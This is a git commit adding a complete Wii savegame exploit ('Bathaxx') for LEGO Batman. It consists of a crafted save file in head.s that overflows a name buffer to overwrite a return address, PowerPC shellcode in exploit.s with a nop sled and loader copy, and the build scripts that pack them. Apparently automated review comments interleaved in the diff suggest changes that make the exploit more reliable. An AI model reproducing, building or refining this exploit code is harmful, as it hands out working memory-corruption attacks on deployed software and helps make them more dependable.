LEGO Batman^H^H^Hhaxx
This commit is contained in:
parent
4d980dfebb
commit
da886e2a72
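--- a/Makefile
+++ b/Makefile
@@ -52,6 +52,7 @@ all: FORCE .version
 	$(Q)$(MAKE) -C loader
 	$(Q)$(MAKE) -C twilight
 	$(Q)$(MAKE) -C lego
+	$(Q)$(MAKE) -C batman
 
 FORCE:
 
@@ -60,3 +61,4 @@ clean:
 	$(MAKE) -C loader clean
 	$(MAKE) -C twilight clean
 	$(MAKE) -C lego clean
+	$(MAKE) -C batman clean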
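--- a/batman/.gitignore
+++ b/batman/.gitignore
@@ -0,0 +1 @@
+FILE_V28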
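--- a/batman/Makefile
+++ b/batman/Makefile
@@ -0,0 +1,116 @@
+# Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+
+# Configuration:
+
+# What toolchain prefix should we use
+CROSS ?= broadway-
+
+# Where are the tools (http://git.infradead.org/users/segher/wii.git)
+TOOLS ?= $(HOME)/wii/segher
+
+# End of configuration.
+
+
+
+# Set CC, LD, OBJCOPY based on CROSS, unless they are set already
+
+ifeq ($(origin CC), default)
+CC := $(CROSS)gcc -m32
+endif
+ifeq ($(origin LD), default)
+LD := $(CROSS)ld
+endif
+OBJCOPY ?= $(CROSS)objcopy
+
+
+# The compiler flags we need.
+
+CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750
+
+
+# Build with "V=1" to see the commands executed; be quiet otherwise.
+
+ifeq ($(V),1)
+Q :=
+else
+Q := @
+MAKEFLAGS += --no-print-directory
+endif
+
+
+targets := rlbp.bin rlbj.bin rlbe.bin
+
+ppms := $(targets:%.bin=%-icon.ppm) rlb-banner.ppm
+assets := title.bin $(ppms)
+
+loader := ../loader/loader.bin
+
+
+titleid = $(shell perl titleid.pl $(1))
+
+
+define twintig
+D=$(call titleid,$(1)); \
+$(TOOLS)/twintig $$D $@ toc-$1
+endef
+
+
+all: $(targets)
+
+$(targets): %.bin: toc-% FILE_V28 $(assets)
+	@echo " TWINTIG $@"
+	$(Q)$(call twintig,$*)
+
+FILE_V28: head.bin exploit.bin $(loader)
+	@echo " LEGOSTACK $@"
+	$(Q)./pack.sh $@ $^
+	$(Q)$(TOOLS)/lego-cksum $@
+
+head.bin: head.elf
+	@echo " OBJCOPY $@"
+	$(Q)$(OBJCOPY) -Obinary $< $@
+
+exploit.bin: exploit.elf
+	@echo " OBJCOPY $@"
+	$(Q)$(OBJCOPY) -Obinary $< $@
+
+exploit.elf: lego.lds exploit.o
+	@echo " LINK $@"
+	$(Q)$(LD) -T $^ -o $@
+
+head.elf: head.o
+	@echo " LINK $@"
+	$(Q)$(LD) -e 0 $< -o $@
+
+exploit.o: exploit.s
+	@echo " ASSEMBLE $@"
+	$(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+head.o: head.s head.b
+	@echo " ASSEMBLE $@"
+	$(Q)$(CC) $(CFLAGS) -c $< -o $@
+
+title.bin: ../.version
+	@echo " TITLEBIN $@"
+	$(Q)perl make-title-bin.pl > $@
+
+../.version: FORCE
+	$(Q)$(MAKE) -C .. .version
+
+$(ppms): %.ppm: %.png
+	@echo " PPM $@"
+	$(Q)convert $< $@
+
+$(loader): FORCE
+	$(Q)$(MAKE) -C ../loader
+
+FORCE:
+
+clean:
+	-rm -f $(targets) FILE_V28
+	-rm -f exploit.bin exploit.elf exploit.o
+	-rm -f head.bin head.elf head.o
+	-rm -f title.bin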
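Review bot: The `FILE_V28` recipe (`$(Q)./pack.sh $@ $^`) never checks that its inputs fit the layout the rest of this commit assumes: head.s pads itself to exactly 64 KiB, exploit.s copies a fixed 0x2000 words (32 KiB) starting right after its own code, and pack.sh cuts the whole file at 128 KiB, so a loader.bin that grows past roughly 32 KiB is silently truncated and only fails on the console. Add a guard before the pack step, for example `$(Q)test $$(stat -c %s $(loader)) -le 32768 || { echo "$(loader) exceeds 32 KiB" >&2; exit 1; }` (GNU stat syntax; adjust for the host). The same size is also hard-coded in exploit.s, so a shared constant, or at least a comment naming the limit next to this rule, would keep them in step.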
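--- a/batman/exploit.s
+++ b/batman/exploit.s
@@ -0,0 +1,45 @@
+# Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
+# Copyright 2011 Bernhard Urban <lewurm@gmail.com>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+.section .start,"ax"
+retadr = 0x90394140
+
+# The return addr for the nintendo loader is a bit different as for 3rd
+# party loaders. In fact, it depends which value is set by the apploader at
+# 0x8000002c:
+# - 0x0: return address is 0x90394140 (some 3rd party loader, e.g. gecko os)
+# - 0x23: return address is 0x90394000 (set by the sysmenu loader by nintendo)
+# 0B ver: 0x90394100
+# to make both work, we insert some no op's here
+.fill (0x140/0x4), 4, 0x60000000
+
+start:
+# Set up a stack frame.
+lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1)
+
+# Stop audio and video.
+lis 0,audio_stop@h ; ori 0,0,audio_stop@l ; mtctr 0 ; bctrl
+lis 0,video_stop@h ; ori 0,0,video_stop@l ; mtctr 0 ; bctrl
+
+# Move code into place; a generous 32kB, starting at 64kB in
+# the save file.
+
+lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4
+lis 4,(retadr-4)@h ; ori 4,4,(retadr-4)@l
+# Calculate proper offset for the loader in memory
+0: lbzu 0,4(4); cmpwi 0,0x60 ; beq 0b
+addi 4,4,-4; addi 4,4,end-start
+
+li 0,0x2000 ; mtctr 0
+0: lwzu 0,4(4) ; stwu 0,4(5) ; bdnz 0b
+
+# Sync caches on it.
+li 0,0x0400 ; mtctr 0 ; mr 5,3
+0: dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz 0b
+sync ; isync
+
+# Go for it!
+mtctr 3 ; bctr
+end: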
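Review bot: The scan loop `0: lbzu 0,4(4); cmpwi 0,0x60 ; beq 0b` classifies a word as part of the nop sled by its first byte alone, so it depends on the first instruction at `start` (`lis 1,0x8080`, whose opcode byte is 0x3c) not beginning with 0x60; an `ori` with a low source register would also begin with 0x60 and be skipped, which would shift the source of the copy. That assumption is not recorded anywhere; add `# assumes the first word at start does not begin with 0x60 (an ori rA,rS<8 would) — keep lis first` above the loop. The fixed counts `0x2000` (words copied) and `0x0400` (32-byte lines flushed) both encode the 32 kB mentioned in the comment above; defining one symbol with `.set` and deriving both from it keeps them consistent if the size ever changes.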
BIN
batman/head.b
Normal file
BIN
batman/head.b
Normal file
Binary file not shown.
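--- a/batman/head.s
+++ b/batman/head.s
@@ -0,0 +1,31 @@
+# Copyright 2011 Bernhard Urban <lewurm@gmail.com>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+retadr = 0x90394140
+0:
+# stolen from some savegame found in teh intertube
+.incbin "head.b"
+
+# give the char a name
+.ascii "you won't see this " # len = 0x14
+
+# smash it \o/ 0x1f0+0x4 bytes all in all...
+.fill (0xf4/4), 4, 0x11111111
+
+# unlock the character (somewhere here actually...)
+.fill (0x10/4), 4, 0x90c10104
+
+# add more padding...
+.fill (0xdc/4), 4, 0x11111111
+
+# now we at the actual vuln return address
+# just point to the loader of the loader (= content of exploit.s)
+.long retadr
+
+# alternatively you can put the code here too and jump into the stack,
+# however then you have to take care for nullbytes in the resulting
+# bytecode, which is a way too tedious. so we just take the further slot for
+# it :-) (LEGO devs are nice ppl, heh)
+
+.fill 0x10000 - (. - 0b)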
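Review bot: The position of `.long retadr` is the sum of hand-counted sizes (`0x14` for the `.ascii` literal plus the three `.fill` blocks), and the comment `# len = 0x14` cannot be checked from the file itself — as rendered on this page the literal is 19 bytes, not 20, which may be a whitespace artifact of the page but would move the slot by one byte if real. Anchor the layout instead of trusting the arithmetic: put a label such as `1:` after `.incbin "head.b"` and, before `.long retadr`, add `.if (. - 1b) != 0x1f4` / `.error "return slot misplaced"` / `.endif` so the assembler fails rather than producing a silently shifted file. The final `.fill 0x10000 - (. - 0b)` already errors on overflow, so only the slot offset lacks such a check.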
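--- a/batman/lego.lds
+++ b/batman/lego.lds
@@ -0,0 +1,22 @@
+/* Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
+This code is licensed to you under the terms of the GNU GPL, version 2;
+see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */
+
+OUTPUT_FORMAT("elf32-powerpc")
+OUTPUT_ARCH(powerpc:common)
+
+SECTIONS {
+audio_stop = 0x8009cfa0;
+video_stop = 0x800ab190;
+
+main = 0x90000020;
+
+.twilight 0x90394000:
+{
+rlb*.o(.start)
+*(.text)
+*(.rodata .rodata.*)
+*(.data)
+*(.bss)
+}
+}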
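Review bot: The input-section pattern `rlb*.o(.start)` does not match the only object this script links — batman/Makefile builds `exploit.elf` from `lego.lds exploit.o` — so exploit.o's `.start` is not claimed by `.twilight` and is placed by ld's orphan-section rules; it apparently ends up at 0x90394000 today, but nothing in the script pins it there, and exploit.s relies on the sled and `start` sitting at that base. Change the line to `*(.start)` (or `exploit.o(.start)`) so the placement is explicit. The file is otherwise a copy of the sibling project's script, so a short header comment saying which addresses (`audio_stop`, `video_stop`, `main`) are game-specific would help the next person who adapts it.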
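--- a/batman/make-title-bin.pl
+++ b/batman/make-title-bin.pl
@@ -0,0 +1,16 @@
+#!/usr/bin/perl
+sub printline {
+my $x = shift;
+chomp $x;
+$x .= "\0" x 32;
+$x = substr $x, 0, 32;
+$x =~ s/(.)/\0$1/g;
+
+print $x;
+}
+
+$name = '"Bathaxx" by lewurm';
+$version = `cat ../.version`;
+
+printline $name;
+printline $version;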
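Review bot: `printline` widens each byte to a two-byte unit with `$x =~ s/(.)/\0$1/g;`, which is only correct for ASCII input; a non-ASCII byte in `$name` or in `../.version` would be split into two meaningless units, and nothing documents that limit. Add a comment above the sub, `# ASCII only: pads/truncates to 32 bytes, then emits them as 32 big-endian 16-bit units (64 bytes)`, and put `binmode STDOUT;` before the first print so the NUL-laden output is written as raw bytes on every platform. The backtick `cat ../.version` could also be a plain open/read to avoid spawning a shell, though that is a style preference.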
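--- a/batman/pack.sh
+++ b/batman/pack.sh
@@ -0,0 +1,3 @@
+#!/bin/bash
+TARGET=$1; shift
+cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null > $TARGET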
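Review bot: `cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null > $TARGET` silently cuts the output at 128 KiB and discards every dd diagnostic, so an oversized input (or a missing one, since cat's error is followed by /dev/zero padding) yields a plausible-looking file with no message. Quote the arguments as `"$@"` and `"$TARGET"`, and check the size before packing: `size=$(cat "$@" | wc -c)` then `[ "$size" -le 131072 ] || { echo "pack.sh: inputs ($size bytes) exceed 128 KiB" >&2; exit 1; }`. Keeping dd's stderr (or using `status=none` only for the progress summary) lets genuine write failures surface instead of being hidden by the redirect.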
BIN
batman/rlb-banner.png
Normal file
BIN
batman/rlb-banner.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 17 KiB |
BIN
batman/rlb-banner.ppm
Normal file
BIN
batman/rlb-banner.ppm
Normal file
Binary file not shown.
BIN
batman/rlbe-icon.png
Normal file
BIN
batman/rlbe-icon.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 2.2 KiB |
BIN
batman/rlbe-icon.ppm
Normal file
BIN
batman/rlbe-icon.ppm
Normal file
Binary file not shown.
BIN
batman/rlbj-icon.png
Normal file
BIN
batman/rlbj-icon.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 2.1 KiB |
BIN
batman/rlbj-icon.ppm
Normal file
BIN
batman/rlbj-icon.ppm
Normal file
Binary file not shown.
BIN
batman/rlbp-icon.png
Normal file
BIN
batman/rlbp-icon.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 2.1 KiB |
BIN
batman/rlbp-icon.ppm
Normal file
BIN
batman/rlbp-icon.ppm
Normal file
Binary file not shown.
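--- a/batman/titleid.pl
+++ b/batman/titleid.pl
@@ -0,0 +1,2 @@
+#!/usr/bin/perl
+print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0];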
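Review bot: The script validates nothing: with no argument `split //, $ARGV[0]` only prints `00010000`, and a game id that is not four characters produces a title id of the wrong length that is caught, if at all, much later by twintig. Add `die "usage: titleid.pl GAMEID\n" unless @ARGV == 1 && length $ARGV[0] == 4;` before the print. Writing `ord uc $_` instead of `ord uc` also makes the implicit `$_` in the map block visible to readers.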
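--- a/batman/toc-rlbe
+++ b/batman/toc-rlbe
@@ -0,0 +1,4 @@
+title.bin
+rlb-banner.ppm
+rlbe-icon.ppm
+FILE_V28 FILE_V28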
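--- a/batman/toc-rlbj
+++ b/batman/toc-rlbj
@@ -0,0 +1,4 @@
+title.bin
+rlb-banner.ppm
+rlbj-icon.ppm
+FILE_V28 FILE_V28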
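--- a/batman/toc-rlbp
+++ b/batman/toc-rlbp
@@ -0,0 +1,4 @@
+title.bin
+rlb-banner.ppm
+rlbp-icon.ppm
+FILE_V28 FILE_V28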